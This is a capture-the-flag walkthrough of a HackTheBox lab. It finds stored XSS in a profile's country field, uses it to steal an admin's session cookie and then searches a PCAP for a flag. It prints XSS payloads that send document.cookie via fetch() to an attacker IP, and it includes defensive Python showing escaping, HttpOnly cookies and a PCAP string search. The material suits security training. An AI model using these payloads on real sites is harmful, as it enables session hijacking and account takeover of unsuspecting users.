HackTheBox - Session Security - Skills Assessment Walkthrough

Ido Abramov

Scenario

You are currently participating in a bug bounty program.

  • The only URL in scope is http://minilab.htb.net

  • Attacking end-users through client-side attacks is in scope for this particular bug bounty program.

  • Test account credentials:

    • Email: heavycat106

    • Password: rocknrol

  • Through dirbusting, you identified the following endpoint http://minilab.htb.net/submit-solution

Find a way to hijack an admin's session. Once you do that, answer the two questions below.

Walkthrough

The first assignment - Read the flag residing in the admin's public profile. Answer format: [string]

Solution:

We start by adding the host to /etc/hosts:

sudo sh -c 'echo "10.129.50.141  minilab.htb.net" >> /etc/hosts'

Log in with the test credentials we were given:

And we enter the next page:

Next, we will try to find any XSS vulnerabilities:

After we click Save, nothing appears to happen.

We click the Share button, which takes us to the profile page. There the XSS executes, and the country field turns out to be the vulnerable one:

Now that I have found the vulnerable field, I want to try to steal the cookies via XSS, using the following payload:

<img src=x onerror=fetch(`http://10.10.14.242:81?c=${document.cookie}`)>

** At first I tried the following payload, but in the output the ‘+’ sign is replaced with a space, which breaks it, so I had to use a payload that avoids the ‘+’ sign:

<img src=x onerror="http://10.10.14.242:81/?c="+document.cookie>

Start a Python HTTP server listening for incoming requests on port 81:

And insert the payload:

Boom - we got our cookie, which means the cookie-stealing XSS payload works!
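From the defender's side, the chain above works because of two weaknesses: the country field is rendered into HTML without output encoding, and the session cookie is readable from JavaScript (document.cookie returned it). The following is an added example, not code from the post or from the lab application: a minimal Python rendering of the profile with the vulnerable and encoded forms side by side, plus the Set-Cookie attributes that would have kept the session value out of document.cookie even if the XSS fired. The profile record and the session id are constructed for the demonstration.

```python
import html
from http.cookies import SimpleCookie

# Constructed profile record, modelled on the injectable "country" field.
# The value is the payload the walkthrough used; here it is only test data.
PROFILE = {
    "name": "heavycat106",
    "country": "<img src=x onerror=fetch(`http://10.10.14.242:81?c=${document.cookie}`)>",
}

# Number of '<' the template itself contributes (<p> and </p>).
TEMPLATE_TAG_COUNT = 2


def render_vulnerable(profile):
    """Interpolates user data straight into the HTML body. Any markup stored
    in 'country' is parsed by the browser and its event handler runs
    (stored XSS), which is what the walkthrough observed on the share page."""
    return f"<p>Country: {profile['country']}</p>"


def render_hardened(profile):
    """Escapes every user-controlled value for the HTML text context before it
    is placed in the page, so the same payload is shown literally as text."""
    return f"<p>Country: {html.escape(profile['country'], quote=True)}</p>"


def user_markup_leaked(rendered):
    """True if the output contains more tag openers than the template itself,
    i.e. user-supplied markup survived into the HTML."""
    return rendered.count("<") > TEMPLATE_TAG_COUNT


def session_cookie_header(session_id, hardened=True):
    """Builds the Set-Cookie header for the session. With HttpOnly the browser
    never exposes the cookie to script, so document.cookie cannot exfiltrate
    it; Secure and SameSite=Strict restrict where it is sent."""
    jar = SimpleCookie()
    jar["session"] = session_id
    if hardened:
        jar["session"]["httponly"] = True
        jar["session"]["secure"] = True
        jar["session"]["samesite"] = "Strict"
        jar["session"]["path"] = "/"
    return jar.output(header="Set-Cookie:")


if __name__ == "__main__":
    print(render_vulnerable(PROFILE))
    print(render_hardened(PROFILE))
    print(session_cookie_header("constructed-session-id"))
```

The two renderings make the fix visible: the hardened form turns `<img ...>` into `&lt;img ...&gt;`, and the hardened cookie header carries `HttpOnly`, so neither half of the attack path remains open. Context-aware encoding (or a templating engine that escapes by default) is the root-cause fix; HttpOnly is the defence in depth that limits the damage when an encoding bug slips through.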

Next, we go to the http://minilab.htb.net/submit-solution endpoint found earlier:

It is missing a URL parameter, so we add one with the value of our account's share URL:

We see that the admin visited the profile:

And we got the admin’s cookie!

Update the cookie in our browser and refresh:

And we are in the admin’s account!

The flag is in the admin’s public profile, but there is no Share button, so we open Change Visibility and make the profile public:

A Share button now appears:

When we click the Share button we see the admin’s profile and find the 1st flag!

1st flag is captured.

The second assignment - Go through the PCAP file residing in the admin's public profile and identify the flag. Answer format: FLAG{string}.

Solution:

Next, the admin's profile offers Flag2 for download: a PCAP file to investigate. Open it with Wireshark:

wireshark download-pcap.pcap

Then we search the capture for the string ‘flag’ and find an HTTP request containing the 2nd flag:
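The same string search done without Wireshark, as an added example that is not part of the original post: a small Python scanner that walks a libpcap file, strips the Ethernet/IPv4/TCP headers and reports every payload line containing the search string. The one-packet capture and the FLAG{...} value are constructed inline so it runs offline; they are not from the challenge file, and the parser intentionally handles only little-endian libpcap with an Ethernet link layer (pcapng is out of scope here).

```python
import struct

PCAP_MAGIC_LE = 0xA1B2C3D4  # little-endian libpcap magic
LINKTYPE_ETHERNET = 1
ETHERTYPE_IPV4 = b"\x08\x00"
IPPROTO_TCP = 6


def build_sample_pcap():
    """Constructs a one-packet libpcap file (Ethernet/IPv4/TCP/HTTP) in memory.
    The HTTP request and the flag value are invented for this demonstration."""
    http = (b"GET /download?token=FLAG{constructed_sample} HTTP/1.1\r\n"
            b"Host: minilab.htb.net\r\n\r\n")
    # TCP: src port, dst port, seq, ack, data offset (5 words), flags PSH|ACK,
    # window, checksum (left zero), urgent pointer
    tcp = struct.pack("!HHIIBBHHH", 40000, 80, 1, 1, 5 << 4, 0x18, 65535, 0, 0) + http
    # IPv4: version/IHL, TOS, total length, id, flags/frag, TTL, proto, checksum, src, dst
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, IPPROTO_TCP, 0,
                     bytes([10, 0, 0, 2]), bytes([10, 0, 0, 1])) + tcp
    eth = b"\x00" * 12 + ETHERTYPE_IPV4 + ip  # zero MACs, IPv4 ethertype
    global_hdr = struct.pack("<IHHiIII", PCAP_MAGIC_LE, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    rec_hdr = struct.pack("<IIII", 0, 0, len(eth), len(eth))  # ts_sec, ts_usec, incl_len, orig_len
    return global_hdr + rec_hdr + eth


def iter_packets(data):
    """Yields the link-layer bytes of each record in a little-endian libpcap file."""
    magic, = struct.unpack_from("<I", data, 0)
    if magic != PCAP_MAGIC_LE:
        raise ValueError("not a little-endian libpcap file (pcapng not supported here)")
    linktype, = struct.unpack_from("<I", data, 20)
    if linktype != LINKTYPE_ETHERNET:
        raise ValueError("only Ethernet link type is handled")
    offset = 24
    while offset + 16 <= len(data):
        _ts_sec, _ts_usec, incl_len, _orig_len = struct.unpack_from("<IIII", data, offset)
        offset += 16
        yield data[offset:offset + incl_len]
        offset += incl_len


def tcp_payload(frame):
    """Strips Ethernet/IPv4/TCP headers, honouring IHL and the TCP data offset.
    Returns None for frames that are not IPv4/TCP."""
    if len(frame) < 34 or frame[12:14] != ETHERTYPE_IPV4:
        return None
    ihl = (frame[14] & 0x0F) * 4
    if frame[14 + 9] != IPPROTO_TCP:
        return None
    tcp_start = 14 + ihl
    data_offset = (frame[tcp_start + 12] >> 4) * 4
    return frame[tcp_start + data_offset:]


def find_string(pcap_bytes, needle):
    """Returns (packet_index, line) for every TCP payload line that contains
    needle, case-insensitively, mirroring a Wireshark string search."""
    hits = []
    for idx, frame in enumerate(iter_packets(pcap_bytes)):
        payload = tcp_payload(frame)
        if not payload:
            continue
        for line in payload.split(b"\r\n"):
            if needle.lower() in line.lower():
                hits.append((idx, line.decode("latin-1")))
    return hits


if __name__ == "__main__":
    for index, line in find_string(build_sample_pcap(), b"flag"):
        print(f"packet {index}: {line}")
```

To run it against a real capture, replace `build_sample_pcap()` with `open(path, "rb").read()`; anything that is not plain libpcap (for example a pcapng export) is rejected rather than misparsed.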

And the 2nd flag is captured as well!
